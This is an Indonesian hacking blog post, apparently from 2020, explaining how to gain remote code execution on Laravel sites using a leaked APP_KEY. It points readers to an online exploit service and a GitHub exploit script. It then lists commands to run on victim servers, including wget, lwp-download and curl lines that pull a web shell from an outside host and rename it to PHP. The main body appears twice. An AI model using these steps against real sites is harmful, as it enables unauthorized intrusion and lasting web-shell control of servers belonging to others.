Tuesday, June 30, 2020
Yow Halo Exploiter, sesuai judul diatas, kali ini saya akan membahas tentang laravel rce menggunakan app_key, sebenernya sama aja dengan rce biasa, tp disini kita menggunakan app key yang terdapat dri .env pada web tersebut. dan tidak semua laravel yang app_key nya di ketahui bisa di RCE. ok langsung saja.
Laravel RCE Via Web
buka https://exploit.anons79.com/ kemudian masukkan target beserta app_key yg kalian dapatkan dan
kemudian masukkan command rcenya
ls -la ( untuk melihat isi dir )
echo "isinya" > namafile.php ( untuk membuat file )
wget http://link.shell -O namashell.php ( untuk upload shell )
jika wget tidak bisa akalin lagi gan :v pake lwp-download
lwp-download http://link.shell/namashell.txt setelah itu rename mv namashell.txt namashell.php
bisa juga pake curl curl -O http://link.shell/namashell.txt namashell.php
Laravel RCE via terminal ( CLI )
download tools https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php
kemudian jalankan toolsnya php rce.php url=http://target.com/ method=1
Ok segitu saja yang bisa saya sampaikan, kurang lebihnya mohon maaf
Thx :
Xai Syndicate
Nakanosec
Mr.Bend
Laravel RCE Via Web
buka https://exploit.anons79.com/ kemudian masukkan target beserta app_key yg kalian dapatkan dan
kemudian masukkan command rcenya
ls -la ( untuk melihat isi dir )
echo "isinya" > namafile.php ( untuk membuat file )
wget http://link.shell -O namashell.php ( untuk upload shell )
jika wget tidak bisa akalin lagi gan :v pake lwp-download
lwp-download http://link.shell/namashell.txt setelah itu rename mv namashell.txt namashell.php
bisa juga pake curl curl -O http://link.shell/namashell.txt namashell.php
Laravel RCE via terminal ( CLI )
download tools https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php
kemudian jalankan toolsnya php rce.php url=http://target.com/ method=1
Thx :
Xai Syndicate
Nakanosec
Mr.Bend